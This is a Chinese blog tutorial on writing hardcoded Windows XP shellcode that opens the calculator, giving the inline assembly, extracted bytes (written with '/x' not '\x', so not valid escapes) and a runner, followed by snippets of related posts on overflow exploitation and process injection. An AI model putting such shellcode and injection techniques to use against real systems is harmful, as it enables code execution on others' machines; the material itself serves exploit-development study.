shellcode——1、采用硬编码弹出计算器

最新推荐文章于 2024-09-19 22:33:02 发布
最新推荐文章于 2024-09-19 22:33:02 发布
阅读量6.5k 收藏 8
点赞数 2
分类专栏: shellcode
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/alwin_cx/article/details/80373347
版权
本文详细介绍了一段使用硬编码方式编写的Shellcode,该Shellcode在Windows XP SP3环境下运行,利用C语言和汇编指令实现了打开计算器的功能。文章涵盖了Shellcode的概念、实验环境配置、编程思路、函数地址定位及汇编代码编写等关键步骤。
摘要由CSDN通过智能技术生成

一、shellcode的介绍

    用一句话给的shellcode的下个定义,那就是“一段可以执行特定功能的机器码”。

二、实验环境及工具介绍

实验环境:Windows XP SP3

实验工具:OllyDbg、WinHex、LordPE

三、编程思路

     用c语言来描述其实就是两句:

WinExec("calc.exe", 5);
ExitProcess(0);
    看到有些文章会在开头还加一句: 
LoadLibrary(“kernel32.dll”);
    看不懂为啥要加这一句,因为大部分软件都会加载kernel32.dll这个的DLL,更何况LoadLibrary()本来就是在kernel32.dll中的。。。


四、确定被调用函数的虚拟地址

    因为这次是用的是硬编码的方式,所以需要通过查找kernel32.dll的导出表,来确定的的WinExec()和ExitProcess()的虚拟地址。使用LordPE加载kernel32.dll,在导出表中查找这两个函数得出两个函数的RVA(相对虚拟地址)为别为:0x000623AD和0x0001CAFA。

    当然,光有RVA是不够的,还需要知道基址,即0x7C800000。


    所以计算得出了ExitProcess()的地址为0x7C81CAFA,WinExec()的地址为0x7C8623AD。

五、编写汇编代码

int main()
{
	__asm
	{
		push ebp
		mov ebp,esp
		//WinExec("calc.exe", 5)
		xor eax,eax						//eax清0
		push eax						//“0x00”,用于分割字符串
		mov eax,0x6578652e				        //".exe"
		push eax
		mov eax,0x636c6163				        //"calc"
		push eax
		mov eax,esp
		push 5							//arg2=SW_SHOW
		push eax						//arg1="calc.exe"
		mov eax,0x7c8623ad				        //WinExec的地址
		call eax
		//ExitProcess(0)
		xor eax,eax
		push eax						//arg1=0
		mov eax,0x7c81cafa				        //ExitProcess的地址
		call eax			

		mov esp,ebp
		pop ebp
	}
	return 0;
}

测试结果:



六、提取机器码

    用OD加载程序,二进制复制,再粘贴到的的WinHex中。


提取机器码,并测试:

unsigned char shellcode[]=
"/x55/x8B/xEC/x33"
"/xC0/x50/xB8/x2E"
"/x65/x78/x65/x50"
"/xB8/x63/x61/x6C"
"/x63/x50/x8B/xC4"
"/x6A/x05/x50/xB8"
"/xAD/x23/x86/x7C"
"/xFF/xD0/x33/xC0"
"/x50/xB8/xFA/xCA"
"/x81/x7C/xFF/xD0"
"/x8B/xE5/x5D/x33";

int main()
{
	__asm
	{
		lea eax,shellcode
		call eax
	}
	return 0;
}


至此,一段用硬编码的shellcode的就完成了(@ _ @)!

参考链接:https://www.cnblogs.com/toorist/p/4428340.html



alwin_cx
关注
专栏目录
shellcode样本—弹出计算器
谈成(C/C++)
04-28 1853
该样本弹出计算器的原理为: 1)先加载MSVCRT.DLL。 2)再使用system()函数调用calc命令。 该shellcode脚本只在xp下通过实验,仅适合用来研究和验证漏洞。其中的函数地址采用的都是固定地址。win7以上不适用。 该样本特点:没有任何0x00,可以参与字符串类溢出。比如strcpy等。 unsigned char shellcode2[] = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
汇编语言编写shellcode实现计算器
yeanhoo的博客
04-04 1977
使用汇编语言编写shellcode,调用WinExec实现弹出计算器,汇编代码如下: .386 .model flat,stdcall ; 代码区域 .code main: push ebp mov ebp,esp sub esp,20h; 开辟栈空间 ; 获取Kernel32基址 assume fs:nothing mov eax,[fs:30h]; peb结构所在地址 mov ...
shellcode2--弹出计算器
gclome的博客
02-18 2329
// 345.cpp : Defines the entry point for the console application. // #include "stdafx.h" #include "stdio.h" #include "windows.h" char shellcode[]="\x66\x81\xEC\x54\x04\x33\xDB\x53\x68\x2E\x65\x78\x65\...
Windows X64 计算器shellcode
最新发布
weixin_54005873的博客
09-19 454
[72, 129, 236, 0, 1, 0, 0, 101, 72, 139, 4, 37, 96, 0, 0, 0, 72, 139, 64, 24, 72, 139, 64, 48, 72, 139, 112, 16, 72, 139, 88, 64, 72, 139, 0, 129, 123, 12, 51, 0, 50, 0, 117, 236, 72, 139, 206, 72, 199, 194, 50, 116, 145, 12, 232, 192, 0, 0, 0, 76, 139, 2
win7下模拟溢出漏洞利用shellcode弹出计算器
天空下得大海
10-07 3372
win7 溢出漏洞 shellcode 弹出计算器
c和汇编混合编程----shellcode----弹出计算器
qq_41683305的博客
02-09 1082
先用c和汇编混合编程成功弹出计算器(在VC++里运行) #include "stdio.h" #include "windows.h" int main(int argc, char* argv[]) { printf("begin\n"); HINSTANCE libHandle; char *dll="kernel32.dll"; libHandle=LoadLibrar...
ShellCode01: 弹出计算器
weixin_30399797的博客
04-15 926
简单地讲,ShellCode就是一段01二进制的机器码,试图利用软件中的漏洞完成自己想做的事情。ShellCode的编写需要考虑和顾及的东西很多,这里先写一个适合新手的范例。 *需要的预备知识: 1.汇编语言(尤其要清楚了解函数是如何调用的) 2.PE文件格式(可参考《Windows PE 权威指南》一书) 3.一点点WinAPI函数 *使用的工具软件: 1.MASM32 2....
栈溢出攻击之弹出计算器
Bonjour~
04-15 7798
一.系统栈溢出原理函数栈帧及寄存器在高级语言中,当函数被调用时,系统栈会为这个函数开辟一个新的栈帧,并把它压入栈中。这个栈帧中的内存空间被它所属的函数独占,正常情况下是不会和别的函数共享的。当函数返回时,系统栈会弹出该函数所对应的栈帧。Win32系统提供两个特殊的寄存器用于标识位于系统栈顶端的栈帧: 1. ESP:栈指针寄存器,其内存放着一个指针,该指针永远指向系统栈最上面一个栈帧的栈顶; 2.
ShellCode —— 无线程注入
墨鱼菜鸡
07-26 184
背景 也叫进程内存替换,就是指将一个进程的内存数据清空,写入任意我们想写入的数据,并更改执行顺序,执行我们写入的数据代码。 简单过程就是: 创建一个挂起主线程的进程(也可以直接挂起目标进程,不自己创建)在新进程的地址...
shellcode
m0_62207482的博客
02-09 614
在漏洞利用中,shellcode是不可或缺的部分,所以在网上有许多公开分享的 shellcode ,在不同平台上并不通用,需要选择适合的shellcode。这里推荐两个常 见公开的安全平台:一个为公开的漏洞库exploit-db(见公众号链接10-1),一个 为公开的Shell-strom库(见公众号链接10-2),如图10-1和图10-2所示。6)成功弹出计算器程序。5)运行后可以成功弹出计算器,如图10-3所示,但这还没有结束,如果目标 机器中没有Python环境,shellcode便无法执行。
shell语言编写计算器源代码,详细注释
qq_29531077的博客
04-22 342
【代码】用shell语言编写计算器源代码,详细注释。
shellcode转换工具
07-26
shellcode转换工具
shellcode帮助工具,直接把exe转shellcode
12-29
Shellcode Helper v1.62 Coded by TeLeMan (c) 2008-2013 Usage: schelper.exe [options] Options: -i [input file] input file (Default: stdin) -o [output file] output file (Default: stdout) -s input file format (Default: Auto-Detection) -sb input file format is Binary -sp the input file format's parameters -d output file format (Default: C format) -db output file format is Binary -dp the output file format's parameters -search get the start offset by the pattern: e.g. PK\x03\x04 -soff fix the match offset after searching (Default: 0) -off convert the input file from the offset (Default: 0) -len convert the input file with the length (Default: 0 - MAX) -en [encoder] encode shellcode (Default: XorDword) -de [encoder] decode shellcode (Default: Auto-Detection) -ex exclude characters: e.g. 0x00,0x01-0x1F,0xFF (Default: 0x00) -in incude characters only -ep the encoder's parameters -t [pid] execute or inject shellcode into process for testing -td [pid] execute or inject shellcode into process for debugging -stack put shellcode into stack and execute it (ESP is the shellcode start) -noinfo display no normal messages except error messages Available formats: 0 - C 1 - C(HexArray) 2 - Perl 3 - Python 4 - Ruby 5 - JavaScript(Escape) 6 - VBScript(Escape) 7 - Pascal 8 - MASM(Data) 9 - HexDump 10 - BitString 11 - HexString 12 - HexArray(C like) 13 - Base64 14 - Binary 15 - HexString(C like) 16 - HexString(Escape) 17 - HexString(JavaScript,UNICODE) 18 - URI(ISO-8859-1) 19 - XML(PCDATA) 20 - BigNumber 21 - BigNumber(Hex) 22 - BigNumber(BaseX) 23 - FloatPoint 24 - UnixTimestamp 25 - GUID 26 - MASM(ASM) 27 - NASM 28 - YASM(ASM) 29 - FASM(ASM) 30 - JWASM(ASM) 31 - POASM(ASM) 32 - GOASM(ASM) 33 - GNU ASM Available encoders:
Shellcode
everysmile的专栏
07-16 523
linux的博大精深就是在于其开源以及其无所不在的脚本,接触了其ShellCode的写书过后,对这个系统有了更进一步的理解。 Shellcode支持Linux下面的所有各种系统命令以及自己所加入的一些程序。基于这种脚本模式,我们可以实现基于各种流程控制的命令执行方式。这就可以给我们提供很大的方便。
Shellcode编写
weixin_54452942的博客
04-23 1236
二是ESI寄存器的值自动增加32位,也就是当第一轮执行之后,esi中放的是下一个函数名称的地址,继续将其指向的内存空间的前四个字节送到eax中(也就是函数名称列表中的第一个函数名称的前四个字节),同时esi加4,指向了第二个函数名称的地址,一直向后比对,直到每个字节都比对成功后,此时的ecx中存的就是目标函数在函数名称列表中的位置。这个成员在PEB结构体中的偏移量是0x0C。在32位Windows系统中,FS寄存器指向TEB的起始地址,而在64位Windows系统中,GS寄存器指向TEB的起始地址。
Shellcode学习代码
小发猫
01-17 1699
#include /*void test(){ // sub esp, 44h int b; int *k=&b; k+=22; (*k) = 88; printf("aaaaaaaaaaaaa %d k = %#0x/n", (*k), k);/* __asm {  mov DWORD PTR [ebp-4], a  mov DWORD PTR [ebp+54h], a }*//* pr
什么是shellcode
qq_44833342的博客
05-29 1105
例如病毒、蠕虫、木马等。一旦成功执行,Shellcode可以允许攻击者执行任意操作,例如获取系统权限、窃取敏感数据、修改文件、控制网络连接等。Shellcode是一段二进制代码,通常用于利用计算机系统中的漏洞,以便攻击者能够在系统上执行任意代码。Shellcode通常是以二进制形式编写的,因此可以直接在内存中执行。Shellcode通常被嵌入到攻击者设计的恶意软件中。,而不需要先将其编译成可执行文件。
十七、Shellcode编码
wanhex的博客
03-10 3418
在很多的漏洞利用场景中,Shellcode的内容会受到限制,这种限制不仅来自存在漏洞的软件自身,在某些情况下,也来自一些基于特征的IDS(网络入侵检测系统)系统。我们先来看看Shellcode会受到哪些限制。 首先,所有的字符串处理函数都会对NULL字节进行限制,通常我们会选择对Shellcode指令进行优化以避免在Shellcode中直接出现NULL字节。 其次,在某些处理流程中可能会限制0x0...
修复dll shellcode 硬编码
09-11
修复DLL中的shellcode硬编码的方法有以下几个步骤: 1. 通过特殊处理,使用正常的方式编写DLL,实现shellcode的效果。这可以通过修改dos头,在其中填入精心构造的bootstrap shellcode来实现。这样处理之后,DLL已经初步具备了shellcode的特征,可以像shellcode一样被执行了。 2. 实现ReflectiveLoader函数。这个函数的作用是将DLL映射到内存中,并解析其中的导出函数和导入函数,使得DLL能够像普通的shellcode一样被执行。 3. 完成以上两项之后,DLL就可以调用任意API和自己编写的函数,从而实现与普通shellcode相同的功能。不过需要注意的是,由于DLL的体积较大,相比于shellcode注入,更容易被检测。 总结起来,修复DLL中的shellcode硬编码可以通过特殊处理和实现ReflectiveLoader函数来实现。这样修复后的DLL可以像普通的shellcode一样被执行,并且具备更多的功能和灵活性。但需要注意的是,由于DLL的体积较大,相比于shellcode注入,更容易被检测。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值